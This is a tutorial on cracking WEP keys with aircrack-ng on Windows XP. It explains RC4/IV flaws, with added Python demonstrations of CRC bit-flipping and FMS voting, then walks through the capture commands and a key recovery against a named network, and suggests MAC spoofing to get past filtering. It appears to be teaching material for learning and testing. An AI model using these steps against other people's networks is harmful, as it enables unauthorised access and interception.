
Cracking WEP with Windows XP Pro SP2

There is a video counterpart to this, in which I describe what I am doing
and how to carry out all the actions in this paper from start to finish.
It will be available as soon as I can secure my web site adequately and
will only ever be available to registered TAZ members. This paper should
be considered the pre-reading for the video.

This is part one in a two part paper on Cracking WEP with Windows XP.
This first part covers sniffing wireless traffic and obtaining the WEP
key. Part Two will cover associating with a Wireless AP, spoofing your
MAC address, trying to log on administratively to the AP and further
things you can carry out on the WLAN once authenticated successfully.

What is WEP:

Wired Equivalent Privacy (WEP) is often mistakenly thought of as a
protocol designed to fully protect wireless traffic, which is not the
case. As its name suggests it was designed to give wireless traffic
roughly the same level of protection as a wired LAN, which when you think
about it is a very hard thing to set out to do.

Wired LANs are inherently more secure than Wireless LANs (WLANs) because
of physical and geographical constraints. For an attacker to sniff data
on a wired LAN they must have physical access to it, which is obviously
easier to prevent than access to traffic on a WLAN, where anyone within
radio range can capture frames.

WEP works at the bottom of the OSI model, at layer Two (the 802.11 MAC
layer), so it only protects the frame body on the air between the radios.
It provides no end-to-end security for the data: once a frame reaches the
AP it is decrypted and forwarded in clear on the wired side.

WEP can provide a level of security between a Wireless Client and an
Access Point or between two wireless clients.

WEP Standards:

WEP is commonly implemented as 64 bit or 128 bit encryption. These
strengths are also referred to as 40 bit and 104 bit, because each data
frame is encrypted with an RC4 keystream, and the RC4 key that generates
that keystream is the concatenation of a 24 bit Initialization Vector
(IV) and the WEP key. For a 64 bit implementation the RC4 key is
therefore a 40 bit WEP key plus a 24 bit IV; for 128 bit it is a 104 bit
WEP key plus the same 24 bit IV. Only the 40 (or 104) bit part is secret,
which is why a 64 bit WEP key is sometimes referred to as a 40 bit WEP
key.

The resulting RC4 keystream is XORed with the plaintext data (plus a
CRC-32 integrity check value, covered below) to encrypt the frame body.
To decrypt it, the receiver takes the IV from the frame, concatenates it
with the same WEP key, regenerates the identical keystream and XORs it
off again. There is more about this, and about the IVs, later on.

Failures of WEP:

Everyone says WEP is easy to crack and should not be used, that it can
be cracked in 10 minutes and so on, but why is this?

Well in my opinion WEP is seriously flawed for the following reasons:

1) Initialization Vectors are reused. An IV is only 24 bits long, so
there are just 2^24 = 16,777,216 of them; a busy AP pushing 1,000 frames
a second runs through the whole space in under five hours, and if IVs are
picked at random a repeat is expected after only about 5,000 frames.
Couple this with the fact that you may have 50+ wireless clients using
the same WEP key (and cards that restart their IV counter at zero every
time they are reset) and repeats become a certainty. The IV is sent in
clear alongside the encrypted part of the frame, so the attacker knows
exactly which frames share a keystream. Reusing any part of the keying
material is a fundamental flaw in a stream cipher, and sending the IV in
clear makes the weakness visible to anyone listening.

Every frame also leaks the first byte of its keystream, because the first
plaintext byte of every WEP data frame is the fixed LLC/SNAP header value
0xAA. Certain 'weak' IVs produce keystreams whose first byte is
statistically related to one byte of the WEP key, so the more distinct
IVs an attacker collects, the more votes each key byte receives and the
closer we get to discovering the WEP key.

This is what forms the foundation of WEP cracking.

2) The integrity check is not a cryptographic one. WEP appends a Cyclic
Redundancy Check (CRC-32) to the payload before encrypting, but CRC-32
was designed to detect transmission errors, not deliberate tampering. It
is linear, so an attacker can flip bits in an encrypted frame and fix up
the encrypted CRC to match, without knowing the key.

3) The most significant flaw in my opinion is the mass use of a single
WEP key. Everything using a particular AP needs the same WEP key, so all
the resulting traffic is encrypted under the exact same key, and every IV
collision and every weak IV from every client counts against that one
key. The not so obvious side effect of this is administrative: if you
have 60 wireless clients all using the same WEP key, do you really want
to go and periodically change them all? It is easier to leave it as it
is. I am guilty of doing this on a network I used to administer a few
years ago, as I am sure others are who still use WEP.
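The CRC-32 point in 2) above is easy to see in code. The following is an added example, not code from the original paper or from aircrack-ng: it seals a payload the way WEP does (payload, CRC-32 ICV, XOR with the keystream), then tampers with the ciphertext and patches the encrypted ICV using nothing but the linearity of CRC-32. Random bytes stand in for the RC4 keystream, since the attack does not depend on how the keystream was produced; the HTTP request is a constructed sample; wep_seal, wep_open and flip_bits are names chosen here, not WEP or aircrack names.

```python
import os
import zlib


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP's integrity check value: a plain CRC-32 of the payload, little-endian."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_seal(keystream: bytes, payload: bytes) -> bytes:
    """Sender side: append the ICV, then XOR (payload || ICV) with the keystream.
    `keystream` stands in for RC4(IV || WEP key); random bytes do for this demo."""
    body = payload + icv(payload)
    assert len(keystream) >= len(body)
    return xor(body, keystream)


def wep_open(keystream: bytes, ciphertext: bytes):
    """Receiver side: strip the keystream, recompute the CRC, compare.
    Returns the payload, or None when the ICV check fails."""
    body = xor(ciphertext, keystream)
    payload, tag = body[:-4], body[-4:]
    return payload if icv(payload) == tag else None


def flip_bits(ciphertext: bytes, delta: bytes) -> bytes:
    """Attacker side, no key needed. XORing `delta` into the encrypted payload
    XORs it into the plaintext too (it is a stream cipher). CRC-32 is affine:
        crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length)
    so the encrypted ICV is patched with crc(d) ^ crc(zeros) in the same way."""
    n = len(ciphertext) - 4
    assert len(delta) == n
    icv_delta = xor(icv(delta), icv(bytes(n)))
    return xor(ciphertext, delta + icv_delta)


def demo():
    """Constructed example: turn an encrypted request for /index into one for
    /admin. The attacker only has to guess the bytes at the positions changed."""
    keystream = os.urandom(64)                  # never seen by the attacker
    original = b"GET /index HTTP/1.0"
    wanted = b"GET /admin HTTP/1.0"             # same length as the original
    on_air = wep_seal(keystream, original)
    tampered = flip_bits(on_air, xor(original, wanted))
    return wep_open(keystream, on_air), wep_open(keystream, tampered)
```

wep_open accepts the tampered frame exactly as a real receiver would, because the patched ICV is the correct CRC of the modified plaintext. The only thing the attacker needed to know was the original content at the positions being changed (here the path), which protocol headers make easy to guess; everything else is XOR and CRC arithmetic. This is why the ICV protects against noise but not against modification.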

Wireless Standards:

The Institute of Electrical and Electronics Engineers (IEEE) published
its specification for wireless LAN traffic, the 802.11 standard, in
1997.

Nowadays 802.11 has many different implementations for wireless traffic.
The most common ones are:

1) 802.11 - the original 1997 standard, which uses the 2.4GHz band with
either Frequency Hopping Spread Spectrum (FHSS) or Direct Sequence Spread
Spectrum (DSSS) at 1 or 2Mbps. FHSS 'hops' between pre-defined
frequencies in a sequence known to both ends, which reduces the effect of
narrow-band noise or interference. DSSS spreads each data bit across a
wider band by combining it with a higher-rate bit sequence (the 'chipping
code'), so the receiver can still recover the data if parts of the band
are noisy or jammed.

2) 802.11a - ratified in 1999, this provides data transmission in the
5GHz band at up to 54Mbps. Unlike the original 802.11 specification it
uses Orthogonal Frequency Division Multiplexing (OFDM), which splits the
data into many narrow sub-carriers transmitted in parallel on adjacent
frequencies, instead of FHSS or DSSS. That parallelism is why the data
rate is so much higher.

3) 802.11b - came along in 1999 with the intention of making wireless
LANs a usable substitute for Ethernet. It transmits data in the 2.4GHz
band at up to 11Mbps using DSSS only. Is sometimes called

4) 802.11g - ratified in 2003, this works in the 2.4GHz band at up to
54Mbps. It uses OFDM like 802.11a and transmits data in a very similar
way, but unlike 802.11a it is backward compatible with 802.11b, because
it shares the 2.4GHz band and still supports the DSSS rates.

A point worth noting here is that an 802.11b-only Wireless Adaptor cannot
decode the OFDM frames an 802.11g network sends at its higher rates, so
you will miss most of the traffic. If you want to get into WEP cracking
it is well worth your while investing in an a/b/g (dual band) card. I
will talk about Wireless Adaptors more later on.

How do we crack WEP:

Cracking WEP is fairly easy to understand if you have followed what I
explained above. We briefly touched on IVs and WEP encryption and how
they tie in together. To put it simply: every frame is encrypted with the
keystream RC4(IV || WEP key), the IV is transmitted in clear, and the WEP
key is the only unknown in that expression.

Two things give the attacker a foothold. First, the attacker knows the
first plaintext byte of every data frame (the LLC/SNAP header always
begins with 0xAA), so XORing it with the first ciphertext byte reveals
the first keystream byte for that IV. Second, the RC4 key scheduling
algorithm has a weakness: for certain IVs (the 'weak' or 'resolved' IVs
identified by Fluhrer, Mantin and Shamir and extended by KoreK) the first
keystream byte depends on one key byte in a predictable way, and guessing
that key byte from the keystream byte is right about 5% of the time, far
better than the 1 in 256 chance of a random guess.

So the attack is statistical rather than a decryption: for each weak IV
captured, Aircrack computes the key byte that IV 'suggests' and adds a
vote for it. With enough IVs the correct value of each key byte collects
many more votes than any other value (this is exactly the byte(vote)
table Aircrack prints, shown later in this paper), and the remaining
uncertainty is removed by a small brute force over the top candidates.
The key bytes are recovered in turn, starting with the first secret byte,
because the weak-IV test for byte N needs bytes 0 to N-1 to be known
already.

Any attacker can passively collect encrypted frames and, because of the
24 bit limitation explained earlier, will sooner or later collect two
frames with the same IV. Two frames with the same IV were encrypted with
the same keystream, so XORing the two ciphertexts cancels the keystream
and leaves the XOR of the two plaintexts. That XOR can be used to infer
the contents of both frames (protocol headers are highly predictable),
and if one plaintext is known or can be guessed, the other falls out
directly.

The more frames sharing an IV, the more plaintext can be revealed. And
once the whole keystream for an IV is known (the plaintext of one frame
of that length), every other frame using that IV can be decrypted without
ever finding the key.

So before any transmission occurs WEP combines the keystream with the
payload using XOR, which produces ciphertext (data that has been
encrypted). The frame body starts with the IV in clear (three bytes,
followed by one byte carrying the key index), then the encrypted payload
and ICV. The receiving AP or client takes that IV, concatenates it with
the shared secret key (your WEP key), regenerates the keystream and
decrypts the payload.

XOR (exclusive or) is a bit-wise operation: each output bit is 1 when
exactly one of the two input bits is 1. The property that matters here is
that it is its own inverse, (P XOR K) XOR K = P, which is why the same
keystream both encrypts and decrypts, and why (P1 XOR K) XOR (P2 XOR K) =
P1 XOR P2 when a keystream is reused.

So in short: the more IVs we collect, the more keystream bytes and the
more votes we gather, and the closer we get to obtaining the key used to
encrypt the data in the first place.

As it is not predetermined which IVs an AP and its clients will use, or
how many of them will be weak ones, it is impossible to say in advance
how many IVs need to be collected, but more about that later.
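The mechanics described in "WEP Standards" and in this section, as an added example that is not part of the original paper and is not aircrack-ng's code: textbook RC4, per-frame WEP encryption with the RC4 key IV || WEP key, the IV-reuse leak (XOR of two ciphertexts with the same IV gives the XOR of the plaintexts), and a simplified version of the FMS vote that Aircrack's byte(vote) table is built from, for the first secret key byte only. The key A6:22:04:09:EB recovered later in this paper is reused here as the test key, the capture is constructed locally, the CRC-32 ICV is left out to keep the code short, and all function names are my own.

```python
import os
from collections import Counter


# Textbook RC4, exactly as WEP uses it: KSA over (IV || WEP key), then PRGA.
def rc4_ksa(key: bytes) -> list:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key: bytes, n: int) -> bytes:
    S, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Every WEP data frame starts with the LLC/SNAP header AA AA 03 00 00 00, so the
# first plaintext byte (0xAA), and therefore the first keystream byte, is known.
SNAP = bytes.fromhex("aaaa03000000")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air: 3-byte IV in clear, then P XOR RC4(IV || key).
    (The CRC-32 ICV that real WEP appends before encrypting is omitted here.)"""
    assert len(iv) == 3 and len(wep_key) in (5, 13)
    return iv + xor(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


# 1. IV reuse: same IV and key means the same keystream, so C1 ^ C2 == P1 ^ P2.
def xor_of_plaintexts(frame1: bytes, frame2: bytes) -> bytes:
    assert frame1[:3] == frame2[:3], "only works when the IV repeats"
    return xor(frame1[3:], frame2[3:])          # no key involved at all


def recover_other_plaintext(frame1: bytes, frame2: bytes, known_p1: bytes) -> bytes:
    return xor(xor_of_plaintexts(frame1, frame2), known_p1)


# 2. FMS-style vote for the first secret key byte (RC4 key byte 3, after the IV).
def replay_iv_steps(iv: bytes):
    """The first three KSA steps depend only on the public IV, so the attacker
    can replay them and see the state S and index j they leave behind."""
    S, j = list(range(256)), 0
    for i in range(3):
        j = (j + S[i] + iv[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def is_resolved(iv: bytes) -> bool:
    """'Resolved' IV: S[1] < 3 and S[1] + S[S[1]] == 3, so the first PRGA output
    is S[3], which step 3 of the KSA sets from the first secret key byte."""
    S, _ = replay_iv_steps(iv)
    return S[1] < 3 and (S[1] + S[S[1]]) & 0xFF == 3


def vote_first_key_byte(frames) -> Counter:
    """Each resolved IV casts one vote. About 5% of the votes land on the true
    key byte (whenever KSA steps 4..255 leave S[1], S[S[1]] and S[3] alone);
    the rest are spread evenly over the other 255 values."""
    votes = Counter()
    for frame in frames:
        iv = frame[:3]
        if is_resolved(iv):
            S, j = replay_iv_steps(iv)
            out0 = frame[3] ^ SNAP[0]                    # first keystream byte
            votes[(S.index(out0) - j - S[3]) & 0xFF] += 1
    return votes


def demo(wep_key: bytes = bytes.fromhex("a6220409eb")):
    """Constructed capture: one frame per IV over a slice of the IV space (all IVs
    starting with 3, plus all IVs ending in 254 or 255), which contains a few
    hundred resolved IVs. A full 2^24 scan is the same loop, only slower."""
    ivs = {bytes((3, b, c)) for b in range(256) for c in range(256)}
    ivs |= {bytes((a, b, c)) for a in range(256) for b in range(256) for c in (254, 255)}
    payload = SNAP + b"\x08\x00" + os.urandom(40)        # SNAP, IPv4 ethertype, junk
    frames = [wep_encrypt(wep_key, iv, payload) for iv in sorted(ivs) if is_resolved(iv)]
    return vote_first_key_byte(frames).most_common(3), wep_key[0]
```

demo() returns the three best-voted candidates for the first key byte alongside the real one; with a few hundred resolved IVs the true byte (0xA6 for the test key) wins by a wide margin, the same picture as the A6( 68) entry in the first row of Aircrack's vote table later in this paper. Aircrack does this for every key byte in turn, uses a larger family of weak-IV conditions (the KoreK attacks), and brute-forces the top few candidates per byte, which is what the fudge factor controls.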

Software Used:

For this attack I am going to use aircrack-ng for Windows, which can be
obtained from here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng
Whilst there, download cygwin1.dll and paste it into the same folder as
Aircrack-ng. There is a copy of cygwin1.dll included already, but the one
available from the tinyshell site is a later version. The peek.dll and
peek5.sys files also need to be in the same directory as aircrack. They
are available here: If you download Winaircrack, which is a GUI version
of what I cover in this paper, copy the peek.dll and peek5.sys files
across to where you have aircrack stored. You will get a 'peek driver not
found' message if you don't do this.

Once it has downloaded you have the option of adding its directory to
your Command Prompt PATH so you can start the application straight from
the command line without having to CD to the correct directory. For
example I added this to my path: C:\Documents and
Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin. In
the bin folder are airodump and aircrack-ng, so now I can just type
airodump straight into the command prompt to run the application.

To add something to your path:

Right click My Computer > Properties > Advanced > Environment Variables
> Under System Variables highlight PATH > Edit > enter the directory
path using a ; to separate it from any existing entries.

You also need to go to Wild Packets to pick up a new driver for your
card. http://www.wildpackets.com/

I have found that the most common cause of stress when trying to crack
WEP is incompatible hardware. The Airopeek driver from Wild Packets is
not compatible with all types of hardware. There is a list of supported
adaptors and the relevant driver you need to use on the web site.

For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND
adaptor which you can get from HERE for 35.99.

This card works with Whax, Auditor and BackTrack pretty much straight
out of the box. It is also a dual band so you don't have to worry about
sniffing traffic on a `g' WLAN when you have a `b' wireless adaptor. It
is my preferred Wireless Adaptor and has not let me down yet. Most cards
that are Atheros based will have the Atheros logo on the side of the
box, use one of these if possible.

**Some people I know have confused the NETGEAR WG511 which does not
work, with the NETGEAR WG511T which does work so try not to fall in to
this trap**

Cards that I can 100% say to stay away from are ones that use the
PrismGT chipset. Conexant cards are also a complete waste of time (which
I found out the hard way), so please do not even think about buying one
of these if you want to crack WEP.

See this list to check what chipset your card uses:

So you should now have:

1) Aircrack-ng
2) cygwin1.dll in the same directory as Aircrack
3) peek.dll and peek5.sys in the same directory as Aircrack
4) The relevant drivers from Wild Packets for your Adaptor
5) aircrack-ng added to your PATH
6) An Adaptor that works with all of the above!

So what's next?

Now we need to install the driver you have downloaded. **Warning - the
next procedure will overwrite your existing Windows driver, so make sure
you have the disc or a backup of it before carrying on.**

The Peek driver will not let you use your Wireless Adaptor in the
conventional way. You won't be able to associate to an AP with it or
browse the internet etc.

Normal Windows drivers make your Wireless Adaptor discard any 802.11
frame not addressed to it, and only pass up frames from the network it
is associated with. The Peek driver puts the Adaptor into monitor
(RFMON) mode, often loosely called promiscuous mode, in which it passes
up every raw 802.11 frame it can hear on the channel without needing to
associate with anything.

To install the driver open up your Device Manager and right click on
your wireless adaptor > Update Driver > Install from a Specific Location
> Don't Search, I will chose the driver to install > Have Disk > Browse
to where you have downloaded the driver > Double Click.

Windows may display a prompt warning you that the driver is not
digitally signed; if this happens click Continue Anyway.

Once the driver is installed we are ready to crack WEP.

**If you get an error message saying `The specified destination contains
no information about your device', you have either downloaded the wrong
driver or more likely your Wireless Adaptor is not compatible with what
we need it to do.**

Cracking WEP:

Cracking WEP is by no means a skilful thing to do, as all the hard work
was done by Christophe Devine, the excellent coder of Aircrack; all we
need to do is collect the data and start the program. If you have
questions about Aircrack a good place to post them is on the Netstumbler
Linux Forums, as I believe the author checks there quite often.
Alternatively you can email the author at devine [at] iie [dot] cnam
[dot] fr - whether he will reply or not I don't know, but I wouldn't have
thought he will appreciate you emailing him with stupid questions - use
the forum for these!


So open a command prompt and type Airodump - or if you have not added it
to your PATH you will need to CD to the right directory.

A new window opens which searches for all installed wireless adaptors,
gives each one a numerical index and displays the following:

Code:
 usage: airodump <nic index> <nic type> <channel(s)> <output prefix> [ivs only flag]

 Known network adapters:

 14  NETGEAR WG511T 54 Mbps Wireless PC Card
 22  NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

 Network interface index number  ->

Select the relevant ID for the card you want to use:

Code: Network interface index number  -> 22

You are then prompted to enter the type of chipset of your card:

Code:
 Interface types:  'o' = HermesI/Realtek
                   'a' = Aironet/Atheros

 Network interface type (o/a)  ->

We are using an Atheros card so we enter 'a':

Code: Network interface type (o/a)  -> a

Then you are asked what channel you would like it to sniff traffic on:

Code: Channel(s): 1 to 14, 0 = all  ->

The USA only allows channels 1 to 11; most of Europe allows 1 to 13, and
channel 14 is only permitted in Japan (and only for 802.11b). Channel 11
is the most common one that wireless APs in the UK default to, so I
normally start off with channel 11. If you want to scan all channels use
the 0 option, but remember that the card then only spends a fraction of
its time on each channel, so you collect IVs from any one AP more
slowly.

We shall use channel 11:

Code: Channel(s): 1 to 14, 0 = all  -> 11

Now you are asked what you would like to save your capture file as:

Code: (note: if you specify the same output prefix, airodump will resume
 the capture session by appending data to the existing capture file)

 Output filename prefix        ->

If you specify a file name that you have already used the resulting data
will be added to the file - which is an excellent feature if it becomes
apparent later on that you do not have enough IV's as you won't have to
start all over again!

Code: Output filename prefix        ->WEP1

Now you are asked if you only want to save the IV's or all packets that
are sniffed.

Code: (note: to save space and only store the captured WEP IVs, press
 y.The resulting capture file will only be useful for WEP cracking)

 Only write WEP IVs (y/n)      ->

As we know to crack a WEP key we only need IV's so we can select yes to
this question. The resultant file will be saved as an .IVS file.

Code: Only write WEP IVs (y/n)      -> y

So now we have told it everything it needs to know, let's see what

 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:09:5B:FD:C6:52   10        3        6  11  54  OPN   HOMEWIRELESS
 00:30:F1:F5:A1:35   60      359     1234  11  54  WEP   Stuart

 BSSID              STATION            PWR  Packets  ESSID

 00:09:5B:FD:C6:52  00:09:5B:B6:1D:2A   17        6  HOMEWIRELESS
 00:30:F1:F5:A1:35  00:09:5B:84:A6:DF   87     1793  Stuart

This is the output from a successful Airodump start-up.

BSSID = The MAC address of the Wireless Access Point.
PWR = The strength of the signal being received.
BEACONS = Every AP transmits around 10 beacons per second. These are not
encrypted and are useless to us from a WEP cracking point of view; they
basically say 'I'm an AP, come and associate with me'.
DATA = This is what we are interested in: the count of data frames
received, each of which carries an IV.
ENC = The encryption in use - WEP / WPA / OPN (open) etc. Speaks for
itself.
ESSID = The name of the wireless network. This is not always broadcast
by the AP but we will need it to associate with the AP later on.

The second part lists any associated clients that are talking to the AP.

Some APs have MAC address filtering enabled. This is a table of MAC
addresses stored on the AP: when you try to associate, the AP checks your
MAC against the list of allowed MACs, and if it is not in the list you
will not be allowed to associate regardless of whether you have the
correct WEP key. You will also leave an entry in the AP's logs. The
station list is therefore a very helpful feature of Airodump: a MAC that
is already talking to the AP is by definition on the allowed list, so it
tells us what to spoof our MAC to when associating with the AP later.


As I mentioned before it is impossible to give an exact number of IVs
that need to be collected to crack a WEP key. The more we can get the
better our chances. From trial and error I have found that I can crack a
40 bit WEP key in a few seconds with around 250,000 - 400,000 IVs. You
may be able to do it with more IVs or fewer, it is different every time.
For a 104 bit WEP key you will need anything up to 2,000,000 IVs and
maybe even more. The fewest IVs I have ever been able to use in one of my
lessons for a 104 bit crack is 710,325, and this took just 4 minutes 31
seconds to crack, but in other lessons I have had to collect in excess of
2 million.

This is where the very handy feature of Airodump appending to existing
files is useful. If you have collected 500,000 IVs and run a 64 bit
attack on the file but are unsuccessful, simply start Airodump again and
use the same file name; all the new IVs will be added to the ones you
already have, so you don't have to start from the beginning all over
again.
So now sit there and wait for the amount of IV's that you decide on to
be collected!


So once you have decided you have enough IVs press Ctrl+C to end
Airodump. I have collected 413,994 IVs for this crack.

You will still have the white command prompt open so just type
Aircrack-ng at the prompt. (Or `CD' to it)

You will now get a list of 'usages' for Aircrack that you can use.

  Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -q         : enable quiet mode (no status output)
      -w <words> : path to a dictionary file

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -d <start> : debug - specify beginning of the key
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length: 64 / 128 / 152 / 256
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x         : do bruteforce the  last two keybytes
      -y         : experimental  single bruteforce mode

As this paper is getting a bit long I will just cover the options we
need to crack a WEP key from a file. If you want to try the other
options out..try them and see what you come up with. The helpful
descriptions provided speak for themselves really.

So we have collected 413,994 IV's which is not enough for a 104 bit WEP
crack so we will try a 40 bit WEP crack instead (we can always add IV's
to the file later on if it does not work)

So we issue the following command to Aircrack:

Code: C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs

We use the -n 64 switch to tell it we think it is a 64 bit WEP key.

You can also use the -f switch, which is the fudge factor switch. In the
programmer's own words:

"By default, this parameter [fudge factor] is set to 2 for 104-bit WEP
and to 5 for 40-bit WEP. Specify a higher value to increase the brute
force level: cracking will take more time, but with a higher likelihood
of success."

So if you have no joy cracking it you can try again with a higher fudge
factor, for example -f 5.

If you forget what you called the Airodump file, it is saved in the
directory the command prompt was in when you started Airodump, which by
default is:

C:\Documents and Settings\%User Name%

If you selected to only save the IVs it will be an .IVS file; if you said
No and wanted to save everything it will be a .cap file.

Our scan only turned up one WEP network, so Aircrack will only crack
those IVs. If the capture contains more than one network you will need to
use the -b switch to give it the BSSID of the AP whose packets you want
to use (the -m switch filters usable packets by MAC address in the same
way).

The result of issuing our command is:

Code:
                                Aircrack-ng 0.3

                   [00:00:00] Tested 1231 keys (got 413994 IVs)

   KB    depth   byte(vote)
    0    0/  4   A6(  68) 82(  40) EE(  20) E4(  15) 18(   5) 23(   5) 04(   3)
    1    0/  3   22(  75) 52(  19) 43(  15) 5A(  13) 21(   8) 8A(   5) B2(   4)
    2    0/  1   04(  76) 33(   8) 8B(   5) C8(   5) 47(   0) 62(   0) 63(   0)
    3    0/  1   09( 106) FB(  15) ED(  12) 58(  12) F0(  11) 29(   7) C8(   5)
    4    0/  1   EB( 153) 19(  27) 0E(  15) 38(  15) B8(  13) E0(  10) DC(   9)

                         KEY FOUND! [ A6:22:04:09:EB ]

There you have it, our 40 bit WEP key is A6:22:04:09:EB. Each row of the
table is one key byte (KB) with its candidate values listed in order of
the votes they received; the depth column shows which of the top
candidates is currently being tried and how many will be tried for that
byte.

With 413,994 IVs this key took Aircrack less than 1 second to crack,
which is an example of how good Aircrack truly is. With 250,000-ish IVs
chances are it would only take a few seconds more to crack, but I like to
collect a few more IVs to be on the safe side.

Like I said the programmer has done all the hard work for us, we just
need to tell it what to do. For an end users part WEP cracking is not a
skilful hack in any way whatsoever (we just tell Aircrack what we want
it to do) unless you want to write your own program for it!


Common problems are:

Incompatible Wireless Card.

90% of my students who come to me complaining that they can't crack WEP
and that Aircrack does not work are failing because they do not have a
compatible Wireless Adaptor. If you are giving exactly the commands that
I am giving here and it still does not work, or you get an error message
when installing the driver, I can almost guarantee you that your card is
not compatible. It is possible to flash the firmware of some Prism2
cards; this page helps you do this:

Can't receive DATA / IV's with Airodump:

To receive IV's from an AP there has to be a client associated with it
that is sending / receiving traffic. If you are not receiving IV's the
most likely causes of this are that there is no associated clients or
you are too far away from the AP. As far as I know Aireplay does not
work with Windows so you will have to use a Packet Injection application
of your choosing. I will cover this in Part 2.

Finally, if you are just plain unlucky you may just not be able to crack
the WEP with the IV's you have. If this happens the only option is to
start from the beginning again.

If you cant crack the 64 bit WEP collect more IV's and try doing it as a
104 bit WEP key.

My thanks go to Christophe Devine, KoreK and all who helped him, for
writing such a helpful application, and to Thomas d'Otreppe who I believe
ported it to Windows.


The following FAQ has been put together from questions in this thread.
Additionally the following link was found by Moo and has proved very


Can we ask that you look through the FAQ in that link and this FAQ
before you post questions here, thanks

Q. I can't get the Wild Packet drivers to work for my xxxxx wireless
card. After I install it says the card will not work properly now?

A. You won't be able to connect to the internet / AP in the conventional
way after you install the Wild Packet drivers - these drivers place your
card in monitor (promiscuous) mode to enable you to receive traffic not
destined for you.

If you fire Airodump up after installing the drivers it should work, if
they have been installed correctly. There are two versions of the
drivers. If it does not work then either the drivers haven't been
installed properly, you have installed the wrong version, or they are
incompatible with your card.

After you have finished go to your device manager in your control panel
and 'roll back' the driver to revert back to the original one so you can
get normal connectivity.

Q. Can I have two different wireless cards installed, one for general
internet surfing and another with the Wild Packet drivers installed for
penetration testing?

A. Yes, this is a good solution; I do it most of the time when I need
internet connectivity and a passive connection at the same time. If you
have more than one PCMCIA slot on your laptop, use the same slot for each
card - this will prevent you having to constantly reinstall the relevant
drivers!

____________________________________________________________

Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll)
failed, make sure this file is present in the current directory." what
does this mean?

A. You will need to get the peek.dll and peek5.sys files and put them in
the same directory as Aircrack.

The easiest way to get them is to go here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Links and download
Winaircrack - which is a GUI version of Aircrack - copy and paste
peek.dll and peek5.sys in to your directory.

You should have added cygwin1.dll, peek.dll and peek5.sys in to your
directory before starting Airodump/Aircrack

Q. When I click on (airdecap-ng, arpforge-ng.....), they quick open and

A. Read all of the paper......specifically the part about adding them to
your path - once you have done this, double-clicking on them won't work
any more.

____________________________________________________________

Q. I have it running fine, but the IV collection is really slow, can I
speed it up at all?

A. If the wireless network does not have many clients, then IV
collection will be very slow. If this is your own network, open up a
command prompt and type:

ping "ip address of AP" -l 65500 -t (That's a small L, not a |)

This sends a constant stream of 65500-byte ICMP packets to the AP. Each
one is far bigger than a single frame, so on the usual 1500-byte MTU it
is fragmented into 45 frames and the reply into 45 more, giving roughly
90 encrypted frames (and IVs) per ping. This will only work if you are
already associated with the AP and is for use to test YOUR OWN WEP KEY;
you cannot use it against somebody else's AP until you have associated
with it.

Q. How do I use Packet Injection to speed up collection of IV's? / I
can't seem to get packet injection program xxxxxx to work properly, can
you help?

A. Unfortunately Packet Injection is outside the scope of this tutorial
and may be covered in a future one. For the time being you will have to
do some research on Google.

